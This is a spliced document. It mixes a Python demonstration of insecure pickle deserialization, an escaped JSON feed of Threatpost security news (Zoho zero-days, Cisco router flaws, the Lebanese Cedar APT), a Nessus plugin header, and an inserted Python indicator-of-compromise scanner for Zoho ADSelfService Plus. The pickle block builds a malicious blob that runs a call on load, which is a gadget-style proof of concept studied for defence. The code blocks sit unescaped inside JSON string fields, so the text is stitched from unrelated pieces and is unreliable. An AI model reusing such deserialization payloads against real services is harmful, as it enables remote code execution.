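        return (os.getcwd, ())


# Constructed blobs standing in for bytes an unauthenticated client could submit.
BENIGN_BLOB = pickle.dumps({"path": "report.txt", "size": 12})
MALICIOUS_BLOB = pickle.dumps(_RecordHeader())


def unsafe_load(blob):
    """The bug class: untrusted bytes go straight into the deserializer."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Resolves a global only if (module, name) is on the allow-list."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def safe_load(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def deserialize_outcome(loader, blob):
    """('ok', value) if the loader accepted the blob, ('blocked', reason) if it refused."""
    try:
        return ("ok", loader(blob))
    except pickle.UnpicklingError as exc:
        return ("blocked", str(exc))


def demo():
    return {
        # The unsafe loader returns os.getcwd()'s result: attacker-chosen code ran on load.
        "unsafe_ran_code": unsafe_load(MALICIOUS_BLOB) == os.getcwd(),
        # Plain data contains no globals, so the allow-list never comes into play.
        "safe_benign": deserialize_outcome(safe_load, BENIGN_BLOB),
        # The same payload is refused before anything is called.
        "safe_malicious": deserialize_outcome(safe_load, MALICIOUS_BLOB)[0],
    }


if __name__ == "__main__":
    print(demo())
```

The allow-list is the fallback, not the first choice: an endpoint that takes serialized objects from an unauthenticated client should not exist at all, and where serialization is unavoidable a data-only format plus authentication of the blob (for instance an HMAC checked before parsing) removes the gadget-hunting problem rather than just narrowing it.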
Nate Warfield, a security researcher with Microsoft, pointed to [at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitoring users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However, Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. 
Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. 
Also previously, a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T15:34:54", "description": "A critical security vulnerability in the Zoho ManageEngine ADSelfService Plus platform could allow remote attackers to bypass authentication and have free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe issue (CVE-2021-40539) has been actively exploited in the wild as a zero-day, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nZoho issued a patch on Tuesday, and CISA [warned that](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) admins should not only apply it immediately, but also ensure in general that ADSelfService Plus is not directly accessible from the internet. The issue affects builds 6113 and below (the fixed version is 6114).\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) solution for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. 
It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n\u201cUltimately, this underscores the threat posed to internet-facing applications,\u201d Matt Dahl, principal intelligence analyst for Crowdstrike, [noted](<https://twitter.com/voodoodahl1/status/1435673342925737991>). \u201cThese don\u2019t always get the same attention as exploit docs with decoy content, but the variety of these web-facing services gives actors lots of options.\u201d\n\nThis isn\u2019t Zoho\u2019s first zero-day rodeo. In March 2020, [researchers disclosed](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) a zero-day vulnerability in Zoho\u2019s ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones and more from a central location. The critical bug ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), with a CVSS score of 9.8) allowed an unauthenticated, remote attacker to gain complete control over affected systems \u2013 \u201cbasically the worst it gets,\u201d researchers said at the time.\n\n## **Authentication Bypass and RCE**\n\nThe issue at hand is an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus, which could lead to remote code execution (RCE), according to Zoho\u2019s [knowledge-base advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>).\n\n\u201cThis vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\u201d according to the firm. 
\u201cThis would allow the attacker to carry out subsequent attacks resulting in RCE.\u201d\n\nEchoing CISA\u2019s assessment, Zoho also noted that \u201cWe are noticing indications of this vulnerability being exploited.\u201d The firm characterized the issue as \u201ccritical\u201d although a CVSS vulnerability-severity rating has not yet been calculated for the bug.\n\nFurther technical details are for now scant (and no public exploit code appears to be making the rounds \u2014 yet), but Dahl noted that the zero-day attacks have been going on for quite some time:\n\n> Observed exploitation of this vuln _before_ CVE-2021-26084 (Atlassian Confluence) which got a lot of attention last week. Some very general observations:\n> \n> 1/ <https://t.co/rIfxxeBlmO>\n> \n> \u2014 Matt Dahl (@voodoodahl1) [September 8, 2021](<https://twitter.com/voodoodahl1/status/1435673338693754886?ref_src=twsrc%5Etfw>)\n\nHowever, he said that the attacks have thus far been highly targeted and limited, and possibly the work of a single (unknown, for now) actor.\n\n\u201cActor(s) appeared to have a clear objective with ability to get in and get out quickly,\u201d he tweeted.\n\nHe also noted similarities to the attacks taking place on Atlassian Confluence instances (CVE-2021-26084), which also started out as limited and targeted. 
However, in that case, researchers were able to \u201crapidly produce\u201d a PoC exploit, he pointed out, and eventually there was proliferation to multiple targeted-intrusion actors, usually resulting in cryptomining activity ([as seen in](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) the recent Jenkins attack).\n\nAtlassian Confluence, like ADSelfService Plus, allows centralized cloud access to a raft of sensitive corporate information, being a collaboration platform where business teams can organize their work in one place.\n\n## How to Know if Zoho ADSelfService Plus Has Been Compromised\n\nUsers can tell if they\u2019ve been affected by checking the \ManageEngine\ADSelfService Plus\logs folder to see if the following strings are found in the access log entries:\n\n * /RestAPI/LogonCustomization\n * /RestAPI/Connection\n\nZoho also said that the presence of the following files in the ADSelfService Plus installation folder indicates that the flaw has been exploited against the installation:\n\n * cer in \ManageEngine\ADSelfService Plus\bin folder.\n * jsp in \ManageEngine\ADSelfService Plus\help\admin-guide\Reports folder.\n
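The two checks above, as an added example in Python (this is not Zoho's or CISA's tooling): the first function scans access-log lines for the two REST API paths after stripping the query string and percent-decoding, comparing case-insensitively so re-cased or encoded variants still match; the second globs the two folders Zoho names for the file types listed. The log lines are constructed in the common log format and are not real ADSelfService Plus logs; the install root is a parameter; and because the article gives only the file extensions, the globs flag any `.cer` under `bin` and any `.jsp` under `help\admin-guide\Reports`, which is wider than Zoho's own list and needs a human look at each hit.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Request paths Zoho lists as signs of exploitation (from the article above).
SUSPICIOUS_PATHS = ("/RestAPI/LogonCustomization", "/RestAPI/Connection")

# Folders Zoho names for the dropped files. Only the extensions are given on
# this page, so these globs are deliberately wider than Zoho's own list.
INDICATOR_GLOBS = (
    (Path("bin"), "*.cer"),
    (Path("help") / "admin-guide" / "Reports", "*.jsp"),
)

# Constructed access-log lines (common log format); not real ADSelfService Plus logs.
SAMPLE_ACCESS_LOG = [
    '10.1.2.3 - - [07/Sep/2021:09:12:01 +0000] "GET /adsf/index.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [07/Sep/2021:09:12:44 +0000] "POST /RestAPI/LogonCustomization HTTP/1.1" 200 312',
    '203.0.113.7 - - [07/Sep/2021:09:12:46 +0000] "POST /RestAPI/Connection?action=x HTTP/1.1" 200 98',
    '203.0.113.7 - - [07/Sep/2021:09:13:10 +0000] "GET /RestAPI/%4Cogoncustomization HTTP/1.1" 200 12',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?"')


def request_path(target):
    """Strip the query string and percent-decode so encoded or re-cased variants still match."""
    return unquote(target.split("?", 1)[0])


def scan_access_log(lines):
    """Return one hit per request line whose path starts with one of the indicator paths."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path = request_path(match.group("target"))
        for indicator in SUSPICIOUS_PATHS:
            if path.lower().startswith(indicator.lower()):
                hits.append({"line": lineno, "method": match.group("method"),
                             "path": path, "indicator": indicator})
                break
    return hits


def indicator_files(install_root):
    """Return paths (relative to install_root, POSIX-style) matching the indicator globs."""
    root = Path(install_root)
    found = []
    for subdir, pattern in INDICATOR_GLOBS:
        folder = root / subdir
        if not folder.is_dir():
            continue
        for candidate in folder.glob(pattern):
            found.append(candidate.relative_to(root).as_posix())
    return sorted(found)


def demo_indicator_check():
    """Self-contained run against a fake install tree built in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        reports = root / "help" / "admin-guide" / "Reports"
        reports.mkdir(parents=True)
        (root / "bin" / "example.cer").write_bytes(b"")            # hypothetical dropped file
        (reports / "example.jsp").write_text("<% /* stub */ %>")     # hypothetical dropped file
        (root / "bin" / "wrapper.dll").write_bytes(b"")              # hypothetical benign file
        return indicator_files(root)


if __name__ == "__main__":
    print(scan_access_log(SAMPLE_ACCESS_LOG))
    print(demo_indicator_check())
```

On a real host, point `indicator_files` at the ADSelfService Plus install root and `scan_access_log` at the files in the `logs` folder; a hit on either list is grounds to treat the server as compromised and to review the AD and SSO privileges it holds, not just to patch it.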
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T12:58:48", "type": "threatpost", "title": "Zoho ManageEngine Password Manager Zero-Day Gets Fix", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189", "CVE-2021-26084", "CVE-2021-40539"], "modified": "2021-09-09T12:58:48", "id": "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "href": "https://threatpost.com/zoho-password-manager-zero-day-attack/169303/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-08T12:01:01", "description": "UPDATE\n\nCisco Systems issued [24 patches Wednesday](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities>) tied to vulnerabilities in its IOS XE operating system and warned customers that two small business routers (RV320 and RV325) are vulnerable to attack and that no patches are available for either. 
A total of 19 of the bugs were rated high severity by Cisco, with the others rated medium.\n\nThe two router vulnerabilities are rated high and affect Cisco\u2019s RV320 and RV325 Dual Gigabit WAN VPN small business routers. Both were first patched in January; however, Cisco said on Wednesday that both patches were \u201cincomplete\u201d and that both routers were still vulnerable to attack. It added in both cases that \u201cfirmware updates that address [these vulnerabilities] are not currently available,\u201d and that there are no workarounds for either vulnerability.\n\nOne of the router flaws ([CVE-2019-1652](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)) is a command injection vulnerability \u201cdue to improper validation of user-supplied input,\u201d Cisco wrote. The bug could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.\n\nThe second router bug ([CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)) is an information disclosure vulnerability also impacting Cisco Small Business RV320 and RV325 routers. \u201cA vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information,\u201d Cisco wrote.\n\n**IOS XE Bugs**\n\nOf the high-severity vulnerabilities, 15 were tied to Cisco\u2019s Internetworking Operating System (IOS) XE, which runs on Cisco networking gear such as its switches, controllers and routers. The bugs ranged from privilege escalation and injection to denial-of-service vulnerabilities.\n\nOne bug ([CVE-2019-1745](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190327-xecmd>)) is a Cisco IOS XE software command injection vulnerability. 
According to Cisco, the vulnerability could be exploited by a local adversary to inject arbitrary commands into the OS that are executed with elevated privileges.\n\n\u201cThe vulnerability is due to insufficient input validation of commands supplied by the user. An attacker could exploit this vulnerability by authenticating to a device and submitting crafted input to the affected commands. An exploit could allow the attacker to gain root privileges on the affected device,\u201d wrote Cisco.\n\nTwo further command injection bugs ([CVE-2019-1756](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190327-iosxe-cmdinject>), [CVE-2019-1755](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190327-iosxe-cmdinject>)) allow a remote, authenticated attacker to execute commands on devices running the vulnerable Cisco IOS XE software.\n\n\u201cThe vulnerability occurs because the affected software improperly sanitizes user-supplied input. An attacker who has valid administrator access to an affected device could exploit this vulnerability by supplying a username with a malicious payload in the web UI and subsequently making a request to a specific endpoint in the web UI,\u201d Cisco said of CVE-2019-1756.\n\n**Four Critical Non-Cisco Bugs Also Reported**\n\nAs part of its flurry of patch announcements, Cisco also posted information regarding four vulnerabilities rated critical for non-Cisco products. 
The critical bugs include:\n\nA server-side request forgery vulnerability in Moodle\u2019s mybackpack functionality ([CVE-2019-3809](<https://tools.cisco.com/security/center/viewAlert.x?alertId=59842>)) that could allow an unauthenticated, remote attacker to conduct a server-side request forgery attack on a targeted system.\n\nA second critical vulnerability was found in the Elastic Kibana Security Audit Logger that could lead to arbitrary code execution ([CVE-2019-7610](<https://tools.cisco.com/security/center/viewAlert.x?alertId=59833>)).\n\nCisco also reported a Python urllib security bypass vulnerability ([CVE-2019-9948](<https://tools.cisco.com/security/center/viewAlert.x?alertId=59825>)) and an Elastic Kibana Timelion Visualizer arbitrary code execution vulnerability ([CVE-2019-7609](<https://tools.cisco.com/security/center/viewAlert.x?alertId=59832>)).\n\n_(This article was updated at 11pm EDT 3/27 to reflect more accurately a lack of patches available for the Cisco RV320 and RV325 routers)_\n", "cvss3": {}, "published": "2019-03-27T21:48:15", "type": "threatpost", "title": "Cisco Releases Flood of Patches for IOS XE, But Leaves Some Routers Open to Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-1745", "CVE-2019-1755", "CVE-2019-1756", "CVE-2019-3809", "CVE-2019-7609", "CVE-2019-7610", "CVE-2019-9948"], "modified": "2019-03-27T21:48:15", "id": "THREATPOST:0B3F568CF532B4D11A2D561F09E1490F", "href": "https://threatpost.com/cisco-releases-flood-of-patches-for-ios-xe-and-small-business-routers/143228/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-02T02:58:26", "description": "Advanced persistent threat (APT) group Lebanese Cedar has compromised at least 250 public-facing servers since early 2020, researchers said, with its latest malware.\n\nThe group has added new features to its custom \u201cCaterpillar\u201d webshell and the \u201cExplosive RAT\u201d remote access trojan 
(RAT), both of which researchers at ClearSky Security said they linked to the [compromise of the public servers [PDF]](<https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf>), which allowed widespread espionage.\n\n\u201cThe target companies are from many countries including: The United States, the United Kingdom, Egypt, Jordan, Lebanon, Israel and the Palestinian Authority,\u201d according to researchers. \u201cWe assess that there are many more companies that have been hacked and that valuable information was stolen from these companies over periods of months and years.\u201d\n\n## An Upgrade for Explosive RAT\n\nLebanese Cedar\u2019s hallmark is trolling for vulnerable systems. The latest, fourth version of Explosive RAT has been used against unpatched Oracle (CVE-2012-3152) and Atlassian (CVE-2019-3396 and CVE-2019-11581) web servers, ClearSky said. The group is also the only [APT group](<https://threatpost.com/apt-groups-success-mix-tools/160927/>) known to use the Explosive RAT code, ClearSky added.\n\nClearSky said it identified specific upgrades made to the new Explosive RAT versus the previous version, which was first used back in 2015 \u2014 namely anti-debugging and encrypted communications between the compromised machine and the command-and-control (C2) server.\n\n\u201cExplosive utilizes multiple evasion techniques to avoid detection and maintain persistence, such as obfuscation, communication encryption and using a separate DLL for API activity,\u201d ClearSky\u2019s report said. \u201cSince 2015, the tool had been minorly changed in obfuscation and communication encryption. The RAT\u2019s control network is well thought out. 
It consists of default hard-coded C2 servers, static update servers and DGA-based dynamic update servers.\u201d\n\nThe new Explosive RAT has additional new spy weapons to use against systems too, like keylogging, screenshot capture and command execution, according to ClearSky, making the threat both stubborn and illicit.\n\n\u201cThe malware\u2019s data-collection capabilities are both passive and active \u2013 it harvests data found on the compromised machine and features the ability to search for data on-demand,\u201d according to ClearSky. \u201cExplosive also features functionalities such as machine fingerprinting, memory-usage monitoring to assure stealth, remote shell and arbitrary code-execution.\u201d\n\n## **Web Shell Updates**\n\nLebanese Cedar\u2019s most recent malware toolkit also uses a second version of the Caterpillar web shell, for the widespread collection of network data and the installation of files on targeted systems.\n\n\u201cActing as a focal point, the group usually attacks web servers via a custom web shell, namely Caterpillar \u2013 a variant of the open-source web shell \u2018ASPXspy,'\u201d ClearSky\u2019s report said. \u201cBy using web shell, the attackers leave their fingerprint on the web server and the internal network, move laterally and deploy additional tools.\u201d\n\nCaterpillar sets out to scout out potentially valuable data, install server configuration files, and even access passwords and usernames, the report added.\n\nThe group uses the web shell to exfiltrate data to the C2 server through VPN services NordVPN or ExpressVPN, the report explained, then installs the file browser.\n\nLebanese Cedar\u2019s use of its signature Explosive RAT is being overtaken by the use of web shells, ClearSky observed.\n\n\u201cThe TTP [tactic, technique and procedure] itself was changed,\u201d ClearSky explains. \u201cIn 2015, Lebanese Cedar relied mostly on Explosive RAT as their main tool. 
In the recent campaign, we identified multiple Caterpillar web shells and less utilization of Explosive RAT (based on our scans). Accordingly, we propose that the main vector of Lebanese Cedar in 2020 is utilization of web shell.\u201d\n\n## **Nation-State Actor, Lebanese Cedar**\n\nLebanese Cedar, also known as \u201cVolatile Cedar,\u201d dates back to 2012 and has links to Hezbollah\u2019s cyber-unit, according to Check Point, which added that the group chooses targets based on politics and ideology. Hezbollah is both a political party and a militant group based in Lebanon.\n\nIn 2015, Check Point researchers also tied the [APT group to the Lebanese government](<https://threatpost.com/volatile-cedar-apt-group-first-operating-out-of-lebanon/111895/>).\n\n\u201cKnown for its highly evasive, selectively targeted and carefully managed operations, Lebanese Cedar follows courses of action associated with APTs funded by nation-states or political groups,\u201d the report added.\n\nA timeline of Lebanese Cedar activity. Source: ClearSky.\n\nVictims have in the past primarily been in the telecom and IT sectors across the globe, including Egypt, Israel, Jordan, the Palestinian Authority, the U.K. and the U.S.\n\n\u201cLebanese Cedar APT\u2019s arsenal consists of a fully fledged web shell, a custom-developed RAT and a set of carefully selected complementary tools, including URI brute-force tools,\u201d Check Point reported. \u201cThe group uses open-source tools alongside their own custom tools, including custom web shell, most likely created by Iranian hacktivist groups such as \u2018ITSecTeam\u2019 and \u2018Persian Hacker.'\u201d\n\nIvan Righi, threat intelligence analyst with Digital Shadows, told Threatpost that he thinks the APT \u201clikely conducted this campaign to support Hezbollah\u2019s motives to obtain sensitive information.\u201d\n\n## **Patching, People! 
**\n\nSince the group uses exploits for known vulnerabilities to gain initial access to targets, patching is the best first defense against these kinds of attacks.\n\n\u201cThat 250 systems have been compromised already documents the importance of patching these solutions, especially when used in the context of cooperation between parties, businesses and government agencies,\u201d Dirk Schrader, global vice president at New Net Technologies, explained to Threatpost. \u201cAs always, the best protection is to establish a good cyber-hygiene, scan for vulnerabilities, patch where possible, and control any changes happening to the infrastructure in between scans.\u201d\n\nTal Morgenstern from Vulcan Cyber agreed that basic security hygiene is still the best line of defense for organizations. Attackers are out on the prowl for the holes they know already exist, he explained.\n\n\u201cThreat actors continue to utilize known vulnerabilities for their gain. In this case, vulnerable public websites are used to distribute malware, making unsuspecting visitors victims using something that could be fixed with a patch or configuration change.\u201d\n\n## **A Plea for InfoSec Collaboration**\n\nMore generally, the best bet against Lebanese Cedar and other similar threat actors is tighter collaboration between vendors, researchers, industry groups and law enforcement, Derek Manky with Fortinet\u2019s FortiGuard Labs told Threatpost.\n\n\u201cFor example, many security organizations provide adversarial threat playbooks that can provide up-to-date analysis and insight on the latest APT groups and malware campaigns to date, with the goal of providing first responders, network defenders and anyone interested with actionable information,\u201d Manky said by email. 
\u201cAlso, organizations will need to know who to inform in the case of an attack so that the \u2018fingerprints\u2019 can be properly shared and law enforcement can do its work.\u201d\n\nBeyond basic inter-disciplinary cooperation, Manky said it\u2019s going to be increasingly important for the security community to start working together as a unified global front.\n\n\u201cCybercriminals face no borders online, so the fight against cybercrime needs to go beyond borders as well,\u201d Manky added. \u201cOnly by working together will we turn the tide against cybercriminals.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. 
Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "cvss3": {}, "published": "2021-02-01T21:18:09", "type": "threatpost", "title": "Hezbollah-Linked Lebanese Cedar APT Infiltrates Hundreds of Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-3152", "CVE-2019-11581", "CVE-2019-3396"], "modified": "2021-02-01T21:18:09", "id": "THREATPOST:145B6B682222579D2623C124AE9DACD5", "href": "https://threatpost.com/hezbollah-lebanese-cedar-apt-servers/163555/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-06-16T16:21:15", "description": "According to its self-reported version, this Cisco Small Business RV Series router is affected by multiple vulnerabilities:\n\n - A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. (CVE-2019-1652)\n\n - A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information.The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. 
A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. (CVE-2019-1653)\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-04-15T00:00:00", "type": "nessus", "title": "Cisco Small Business RV320 and RV325 Routers Multiple Vulnerabilities (cisco-sa-20190123-rv-inject, cisco-sa-20190123-rv-info)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2022-05-20T00:00:00", "cpe": ["x-cpe:/o:cisco:small_business_rv_series_router_firmware"], "id": "CISCO-SA-20190123-RV-INJECT.NASL", "href": "https://www.tenable.com/plugins/nessus/124060", "sourceData": "#TRUSTED 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\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124060);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/20\");\n\n script_cve_id(\"CVE-2019-1652\", \"CVE-2019-1653\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm78058\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvg85922\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20190123-rv-inject\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20190123-rv-info\");\n script_xref(name:\"IAVA\", value:\"2019-A-0356\");\n script_xref(name:\"IAVA\", value:\"0001-A-0008-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0009-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Cisco Small Business RV320 and RV325 Routers Multiple Vulnerabilities (cisco-sa-20190123-rv-inject, cisco-sa-20190123-rv-info)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, this Cisco Small Business RV\nSeries router is affected by multiple vulnerabilities:\n\n - A vulnerability in the web-based management interface of\n Cisco Small Business RV320 and RV325 Dual Gigabit WAN\n VPN Routers could allow an authenticated, remote\n attacker with administrative privileges on an affected\n device to execute arbitrary commands.The vulnerability\n is due to improper validation of user-supplied input. An\n attacker could exploit this vulnerability by sending\n malicious HTTP POST requests to the web-based management\n interface of an affected device. A successful exploit\n could allow the attacker to execute arbitrary commands\n on the underlying Linux shell as root. (CVE-2019-1652)\n\n - A vulnerability in the web-based management interface of\n Cisco Small Business RV320 and RV325 Dual Gigabit WAN\n VPN Routers could allow an unauthenticated, remote\n attacker to retrieve sensitive information.The\n vulnerability is due to improper access controls for\n URLs. An attacker could exploit this vulnerability by\n connecting to an affected device via HTTP or HTTPS and\n requesting specific URLs. A successful exploit could\n allow the attacker to download the router configuration\n or detailed diagnostic information. 
